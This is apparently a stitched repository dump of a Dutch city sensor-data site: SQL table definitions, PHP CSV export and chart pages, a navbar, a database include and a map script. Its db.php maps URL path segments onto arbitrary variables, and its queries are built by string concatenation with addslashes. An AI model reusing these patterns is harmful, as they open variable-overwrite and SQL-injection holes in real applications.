`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement95`
--
DROP TABLE IF EXISTS `measurement95`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement95` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement96`
--
DROP TABLE IF EXISTS `measurement96`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement96` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement97`
--
DROP TABLE IF EXISTS `measurement97`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement97` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement98`
--
DROP TABLE IF EXISTS `measurement98`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement98` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement99`
--
DROP TABLE IF EXISTS `measurement99`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement99` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
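--
-- Note: each `measurement<N>` table stores the time series (Moment, Tagvalue)
-- for the point with Id = N in the `point` table below; the PHP export and
-- chart scripts derive the table name from the point id.
--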
--
-- Table structure for table `nbiotraw`
--
DROP TABLE IF EXISTS `nbiotraw`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `nbiotraw` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=3690 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `node`
--
DROP TABLE IF EXISTS `node`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `node` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Name` text,
`Lastlocationlat` decimal(10,5) DEFAULT NULL,
`Lastlocationlon` decimal(10,5) DEFAULT NULL,
`Devid` text NOT NULL,
`Hwserial` text NOT NULL,
`Ch0` bigint(20) NOT NULL DEFAULT '0',
`Ch1` bigint(20) NOT NULL DEFAULT '0',
`Ch2` bigint(20) NOT NULL DEFAULT '0',
`Ch3` bigint(20) NOT NULL DEFAULT '0',
`Ch4` bigint(20) NOT NULL DEFAULT '0',
`Ch5` bigint(20) NOT NULL DEFAULT '0',
`Ch6` bigint(20) NOT NULL DEFAULT '0',
`Ch7` bigint(20) NOT NULL DEFAULT '0',
`Sf7` bigint(20) NOT NULL DEFAULT '0',
`Sf8` bigint(20) NOT NULL DEFAULT '0',
`Sf9` bigint(20) NOT NULL DEFAULT '0',
`Sf10` bigint(20) NOT NULL DEFAULT '0',
`Sf11` bigint(20) NOT NULL DEFAULT '0',
`Sf12` bigint(20) NOT NULL DEFAULT '0',
`Lastmessage` datetime NOT NULL,
`Packets` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=160 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `point`
--
DROP TABLE IF EXISTS `point`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `point` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Name` text NOT NULL,
`Unitid` bigint(20) NOT NULL,
`Nodeid` bigint(20) NOT NULL,
`Priority` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=405 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `ttngateways`
--
DROP TABLE IF EXISTS `ttngateways`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `ttngateways` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` text,
`Lastseen` datetime DEFAULT NULL,
`Latitude` decimal(10,6) DEFAULT NULL,
`Longitude` decimal(10,6) DEFAULT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Gwid_UNIQUE` (`Gwid`(20))
) ENGINE=MyISAM AUTO_INCREMENT=32128 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `unit`
--
DROP TABLE IF EXISTS `unit`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `unit` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Unit` text,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2019-10-09 20:25:58
<file_sep><?php
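/*
 * CSV export (aidexport.csv): downloads the most recent measurements of one node
 * as semicolon-separated CSV, one column per point and one row per timestamp.
 * Parameters: id (node id, required), limit (rows per point, capped at 50000),
 * admin (skips the public node filter). Uses the measurement<pointid> tables
 * and the mysqlquery() helper from db.php.
 */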
if(!isset($_REQUEST['id']) || !is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
header("Content-type: text/csv");
header('Content-Disposition: attachment; filename='.date("YmdHis").'_'.$_REQUEST['id'].'_aidexport.csv');
header("Pragma: no-cache");
header("Expires: 0");
$limit = 1000;
if(isset($_REQUEST['limit']) && is_numeric($_REQUEST['limit'])) {
$limit = $_REQUEST['limit'];
if($limit > 50000){
$limit = 50000;
}
}
include('db.php');
if(!isset($_REQUEST['admin'])) {
if(in_array($_REQUEST['id'], $GLOBALS['nodefilter'])) {
die('oops, deze pagina is niet beschikbaar');
}
}
$sql = 'SELECT * FROM node WHERE id = '.addslashes($_REQUEST['id']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row);
$arrPoints = null;
$sql1 = 'SELECT point.id AS \'Id\', point.name AS \'Name\', unit.Unit AS \'Unit\' FROM point, unit WHERE point.Nodeid = '.addslashes($row['Id']).' AND point.Unitid = unit.Id';
//echo $sql;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$arrPoints[] = array('id' => $row1['Id'], 'name' => $row1['Name'], 'unit' => $row1['Unit']);
}
$limit = $limit * count($arrPoints);
if($arrPoints != null) {
$sql2 = '';
foreach($arrPoints as $point) {
if($sql2 != '') {
$sql2 .= ' UNION ';
}
$sql2 .= 'SELECT \''.$point['id'].'\' AS \'Tagid\', Moment, Tagvalue FROM measurement'.$point['id'].'';
}
$sql2 .= ' ORDER BY Moment DESC, Tagid ASC LIMIT '.addslashes($limit);
//echo $sql2;
$lastData = null;
$data = array();
$i = -1;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row2);
if($lastData != $row2['Moment']) {
$i++;
$lastData = $row2['Moment'];
}
$data[$i]['Moment'] = $row2['Moment'];
$data[$i][$row2['Tagid']] = $row2['Tagvalue'];
}
} else {
echo 'Geen data beschikbaar';
exit();
}
//var_dump($data);
echo 'Moment';
//var_dump($arrPoints);
foreach($arrPoints as $point) {
//var_dump($point);
echo ';'.$point['name'].' ['.$point['unit'].']';
}
echo ';'."\n";
foreach($data as $dataMoment) {
echo $dataMoment['Moment'];
foreach($arrPoints as $point) {
echo ';';
if(array_key_exists($point['id'], $dataMoment)) {
// strip trailing zeros (and a trailing decimal point) from the decimal(10,5) value
echo rtrim(rtrim($dataMoment[$point['id']], '0'), '.');
} else {
echo '';
}
}
echo ';'."\n";
}
}
?><file_sep><!-- Fixed navbar -->
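<!-- Shared navigation bar: the active menu entry is chosen by matching parts of
     $_SERVER['REQUEST_URI'] (raw.php, gateway.php, node pages, chartcombined ids). -->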
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="https://apeldoornindata.nl">Apeldoorn in Data</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<?php
echo '<li><a href="https://apeldoornindata.nl">Home</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'map.php') !== false ) {
echo ' class="active"';
}
echo '><a href="https://apeldoornindata.nl/map.php">Kaart</a></li>'."\n";
echo '<li><a href="https://apeldoornindata.nl/index.php/category/apeldoorn-in-data/">Blog</a></li>'."\n";
echo '<li class="dropdown';
if(strpos($_SERVER['REQUEST_URI'], 'raw.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'gateway.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'nodeoverview.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'node.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'chart') !== false ) {
echo ' active';
}
echo '">'."\n";
echo '<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Details<span class="caret"></span></a>'."\n";
echo '<ul class="dropdown-menu">'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'raw.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'raw.php">Ruwe data</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'gateway.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'gateway.php">Gateways</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'node.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'nodeoverview.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'nodeoverview.php">Nodes</a></li>'."\n";
echo '<li class="';
if(strpos($_SERVER['REQUEST_URI'], 'chart') !== false ) {
echo 'active ';
}
echo ' dropdown-submenu"><a href="#" class="dropdown-toggle" data-toggle="dropdown">Grafieken</a>'."\n";
echo '<ul class="dropdown-menu">
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=01') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=01">Temperatuur</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=2') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=2">Relatieve vochtigheid</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=3') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=3">Luchtdruk</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=4') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=4">Lichtintensiteit</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=5') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=5">Batterij</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=6') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=6">Radio actieve straling</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=7') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=7">Fijnstof</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=8') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=8">Fijnstof - SDS011 - PM2.5</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=9') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=9">Fijnstof - SDS011 - PM10</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=10') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=10">Fijnstof - PM2.5 & PM10</a></li>'."\n";
echo '<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=11') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=11">Fijnstof - PM2.5 2018</a></li>'."\n";
echo '<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=12') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=12">Fijnstof - PM10 2018</a></li>'."\n";
echo '
</ul>'."\n";
echo '</li></ul>'."\n";
echo '</li>'."\n";
echo '<li><a href="'.$GLOBALS['url'].'index.php/links/">Links</a></li>'."\n";
echo '</ul>'."\n";
?>
<ul class="nav navbar-nav navbar-right">
<li><a href="<?php echo $GLOBALS['url']; ?>#contact">Contact</a></li>
</ul>
</div><!--/.nav-collapse -->
</div>
</nav>
<file_sep><?php
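/*
 * Shared include (db.php): database connection, global URL settings, node filter
 * and helper functions (mysqlquery, logging, error/exception handlers, timing).
 * The database credentials below are left empty here and must be filled in for
 * a deployment.
 */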
ob_start();
date_default_timezone_set('Europe/Amsterdam');
header('Content-Type: text/html; charset=iso-8859-1');
// loadtime
if(!function_exists("getmicrotime"))
{
function getmicrotime() {
list($usec, $sec) = explode(" ",microtime());
return ((float)$usec + (float)$sec);
}
}
global $footerJS;
global $time_start;
$time_start = getmicrotime();
$DBhost = "localhost";
$Dbnaam = "";
$DBuser = "";
$DBpass = "";
$mysqli = new mysqli($DBhost, $DBuser, $DBpass, $Dbnaam);
if ($mysqli->connect_errno) {
printf("Connect failed: %s\n", $mysqli->connect_error);
exit();
}
$GLOBALS['mysqli'] = $mysqli;
// Global vars
$GLOBALS['url'] = 'https://apeldoornindata.nl/';
$GLOBALS['urlimg'] = 'https://apeldoornindata.nl/images/';
$GLOBALS['urlstyle'] = 'https://apeldoornindata.nl/style/';
$GLOBALS['urljs'] = 'https://apeldoornindata.nl/js/';
$GLOBALS['urldata'] = 'https://apeldoornindata.nl/data/';
$GLOBALS['nodefilter'] = array(78, 79, 81, 82, 83, 84, 87, 120);
if(!function_exists("isequal"))
{
function isequal($variable, $value)
{
if(isset($variable))
{
if($variable == $value)
return true;
else
return false;
}
else
{
if($value == null)
return true;
else
return false;
}
}
}
if(!function_exists("vardump"))
{
function vardump($variable)
{
echo '<pre>';
var_dump($variable);
echo '</pre>';
}
}
if(session_id() == '')
{
@session_start();
}
// begin url with / : map /key/value pairs from PATH_INFO onto variables
if(isset($_SERVER['PATH_INFO']))
{
$vardata = explode('/', $_SERVER['PATH_INFO']);
$num_param = count($vardata);
if($num_param % 2 == 0)
{
$vardata[] = '';
$num_param++;
}
for($i = 1; $i < $num_param; $i += 2)
{
${$vardata[$i]} = $vardata[$i+1];
}
}
// end url with /
/*if(!empty($_SERVER['PATH_INFO']))
{
$_aGET = substr($_SERVER['PATH_INFO'], 1);
$_aGET = explode('/', $_aGET);
}*/
if(!empty($_SERVER['REQUEST_URI']))
{
$_aGET = explode('/', str_replace(str_replace('.php', '', $_SERVER["SCRIPT_NAME"]).'/', '', $_SERVER["REQUEST_URI"]));
}
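// Wrapper around mysqli::query(): reuses the shared connection, records timing
// statistics in $sqlstats and logs failed queries via logError().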
function mysqlquery($sql)
{
// reuse the shared connection if it exists, otherwise (re)connect
if(!isset($GLOBALS['mysqli'])) {
$mysqli = new mysqli($GLOBALS['DBhost'], $GLOBALS['DBuser'], $GLOBALS['DBpass'], $GLOBALS['Dbnaam']);
if ($mysqli->connect_errno) {
printf("Connect failed: %s\n", $mysqli->connect_error);
exit();
}
$GLOBALS['mysqli'] = $mysqli;
}
global $sqlstats;
$starttijd = getmicrotime();
$result = $GLOBALS['mysqli']->query($sql);
$stoptijd = getmicrotime();
if(!isset($sqlstats['totaltime']))
{
$sqlstats['totaltime'] = 0;
}
$sqlstats['totaltime'] = $sqlstats['totaltime']+($stoptijd-$starttijd);
if(!isset($sqlstats['totalquerys']))
{
$sqlstats['totalquerys']=0;
}
$sqlstats['totalquerys'] = $sqlstats['totalquerys']+1;
$queryDuration = ($stoptijd-$starttijd);
$queryDuration = str_pad($queryDuration, 19, '0', STR_PAD_LEFT);
// collapse all whitespace in the query to a single space for compact logging
$logString = $queryDuration.' - '.preg_replace('/\s+/', ' ', $sql);
if($result)
{
//logInfo($logString);
}
else
{
logError('Mysqlquery - No Result: '.$logString);
}
//$e = new Exception();
//$trace = $e->getTrace();
//$sqlstats[] = array ('tijd' => $stoptijd-$starttijd, 'query' => $sql, 'caller' => $trace[1]);
return $result;
}
mysqlquery('SET NAMES UTF8');
function loadingtime($time_start,$comment)
{
global $loadingtime, $arrLoadintime;
$tijdnu = getmicrotime();
$arrLoadintime[] = array ('comment' => $comment, 'parttime' => $tijdnu-$loadingtime, 'totaltime' => $tijdnu-$time_start);
$loadingtime = $tijdnu;
return $loadingtime;
}
function logError($msg)
{
//logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_error.log", $msg);
}
function logInfo($msg)
{
if($_SERVER["DOCUMENT_ROOT"] != '')
{
logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_info.log", $msg);
}
else
{
logToFile('/home/openpanel-admin/sites/domotica.wiredhouse.nl/public_html'."/log/".date("Ymd", time())."_info.log", $msg);
}
}
function logDebug($msg)
{
//logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_debug.log", $msg);
}
function logToFile($filename, $msg)
{
// open file
$fd = fopen($filename, "a");
// append date/time to message
$str = "[" . date("Y/m/d H:i:s", time()) . "] " . $msg;
// write string
fwrite($fd, $str . "\n");
// close file
fclose($fd);
}
function errorhandler($type, $msg, $file, $line)
{
// log all errors
$logtext = "Error - File: ".$file." Line: ".$line." - ";
if(isset($_SERVER['REMOTE_ADDR'])){
$logtext .= $_SERVER['REMOTE_ADDR'];
}
$logtext .= " - ".$msg." (error type ".$type.")";
if(isset($_SERVER['HTTP_REFERER']))
{
$logtext .= ' Refer: '.$_SERVER['HTTP_REFERER'].' ';
}
if(isset($_SERVER['HTTP_USER_AGENT']))
{
$logtext .= ' - User Agent: '.$_SERVER['HTTP_USER_AGENT'];
}
if(isset($_SERVER['REQUEST_URI']))
{
$logtext .= ' - REQUEST_URI: '.$_SERVER["REQUEST_URI"];
}
logError($logtext);
// if fatal error, die()
if ($type == E_USER_ERROR)
{
die($msg);
}
}
function exceptionhandler($exception)
{
// log all errors
$logtext = "Exception - File: ".$exception->getFile()." - Line: ".$exception->getLine()." - Exception: ".$exception->getMessage()." - ".$_SERVER['REMOTE_ADDR']."";
if(isset($_SERVER['HTTP_REFERER']))
{
$logtext .= ' Refer: '.$_SERVER['HTTP_REFERER'].' ';
}
if(isset($_SERVER['HTTP_USER_AGENT']))
{
$logtext .= ' - User Agent: '.$_SERVER['HTTP_USER_AGENT'];
}
if(isset($_SERVER['REQUEST_URI']))
{
$logtext .= ' - REQUEST_URI: '.$_SERVER["REQUEST_URI"];
}
logError($logtext);
}
function aasort(&$array, $key)
{
$sorter=array();
$ret=array();
reset($array);
foreach ($array as $ii => $va) {
$sorter[$ii]=$va[$key];
}
asort($sorter);
foreach ($sorter as $ii => $va) {
$ret[$ii]=$array[$ii];
}
$array=$ret;
}
// report all errors
error_reporting(E_ALL);
ini_set('display_errors', '1');
// define custom handler
set_error_handler("errorhandler");
set_exception_handler("exeptionhandler");
//header('Content-Type: text/html; charset=iso-8859-1');
header('Content-Type: text/html; charset=utf-8');
?><file_sep><?php
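/*
 * chartcombined.php: draws one Google line chart that combines all recently
 * active nodes for a measurement type (id 1..12, e.g. temperature, humidity,
 * particulate matter). The optional daysback parameter shifts the plotted day;
 * the series data is fetched from chartdata.php as JSON.
 */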
if(!isset($_REQUEST['id']) || !is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$daysback = 0;
if(isset($_REQUEST['daysback']) && is_numeric($_REQUEST['daysback'])) {
$daysback = abs(addslashes($_REQUEST['daysback']));
$startDay = $daysback*-1 - 1;
}
include('db.php');
if($_REQUEST['id'] == null) {
echo 'id niet ingegeven';
exit();
}
$points = null;
$multipleAxis = false;
switch($_REQUEST['id']) {
case 1:
$mesurementType = 'Temperatuur';
break;
case 2:
$mesurementType = 'Relative vochtigheid';
break;
case 3:
$mesurementType = 'Luchtdruk';
break;
case 4:
$mesurementType = 'Lichtintensiteit';
break;
case 5:
$mesurementType = 'Batterij';
break;
case 6:
$mesurementType = 'Radio actieve straling';
break;
case 7:
$mesurementType = 'Fijnstof';
break;
case 8:
$mesurementType = 'PM2.5';
break;
case 9:
$mesurementType = 'PM10';
break;
case 10:
$mesurementType = 'PM2.5 & PM10';
break;
case 11:
$mesurementType = 'PM2.5 2018';
break;
case 12:
$mesurementType = 'PM10 2018';
break;
default:
echo 'Onbekend type.';
exit;
break;
}
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE node.id = point.Nodeid AND point.Name LIKE \'%'.$mesurementType.'%\' AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
if($_REQUEST['id'] == 10) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)) OR (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY))';
//echo $sql;
}
if($_REQUEST['id'] == 11) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
if($_REQUEST['id'] == 12) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = $row['NodeName'].' - '.$row['PointName'];
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
// Load the Visualization API and the corechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=combined&daysback=<?php echo $daysback; ?>",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 50},
legend: {position: 'none'},
vAxis: {format:'#.#' <?php
// fixed vertical-axis ranges (max values) for selected measurement types; other charts autoscale
$viewWindowMax = array(6 => 250, 8 => 200, 9 => 200, 10 => 200, 11 => 1500, 12 => 1500);
if(array_key_exists((int)$_REQUEST['id'], $viewWindowMax)) {
echo ', viewWindow: { max: '.$viewWindowMax[(int)$_REQUEST['id']].', min: 0 }';
}
?>
},
hAxis: {
format: 'HH:mm:ss',
},
height: 600
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
<?php
foreach($points as $point) {
echo 'data.addColumn(\'number\', \''.$point.'\');'."\n";
}
?>
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm:ss"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
</script>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
echo "\n";
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<h1>'.$mesurementType.'</h1>'."\n";
?>
<!--Div that will hold the line chart-->
<div id="chart_div" style="width: 90%; height: 90%;"></div>
<?php
echo '<br/><a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback+1).'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-left"></button></a><a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-stop"></button></a>';
if($daysback > 0) {
echo '<a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback-1).'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-right"></button></a><br/><br/>'."\n";
} else {
echo '<button type="button" class="btn btn-default" disabled="true"><span class="glyphicon glyphicon-chevron-right"></button><br/><br/>'."\n";
}
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript">
//create trigger to resizeEnd event
$(window).resize(function() {
if(this.resizeTO) clearTimeout(this.resizeTO);
this.resizeTO = setTimeout(function() {
$(this).trigger('resizeEnd');
}, 500);
});
//redraw graph when window resize is completed
$(window).on('resizeEnd', function() {
drawChart(data);
});
</script>
</body>
</html><file_sep>function init() {
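// Map page initialisation: sets up the Dutch RD New projection (EPSG:28992),
// PDOK background layers (aerial photo, topography, AHN) and two clustered
// sensor layers fed by data/sensors_json.php, plus a popup showing sensor values.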
proj4.defs("EPSG:28992","+proj=sterea +lat_0=52.15616055555555 +lon_0=5.38763888888889 +k=0.9999079 +x_0=155022 +y_0=463015 +ellps=bessel +towgs84=565.417,50.3319,465.552,-0.398957,0.343988,-1.8774,4.0725 +units=m +no_defs");
var projection = new ol.proj.Projection('EPSG:28992');
var projectionExtent = [-285401.92,22598.08,595401.92,903402.0];
var size = ol.extent.getWidth(projectionExtent) / 256;
// generate resolutions and matrixIds arrays for PDOK WMTS
var resolutions = [3440.64, 1720.32, 860.16, 430.08, 215.04, 107.52, 53.76, 26.88, 13.44, 6.72, 3.36, 1.68, 0.84, 0.42]
var matrixIds = new Array(resolutions.length);
for (var z = 0; z < resolutions.length; ++z) matrixIds[z] = 'EPSG:28992:' + z;
// get last hour sensor data
var sensorHourDataSource = new ol.source.GeoJSON({
url: 'data/sensors_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992'
});
var sensorHourStyleCache = {};
var sensorHourDataLayer = new ol.layer.Vector({
title: 'sensoren laatste 24 uur',
source: new ol.source.Cluster({
distance: 40,
source: sensorHourDataSource,
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorHourStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
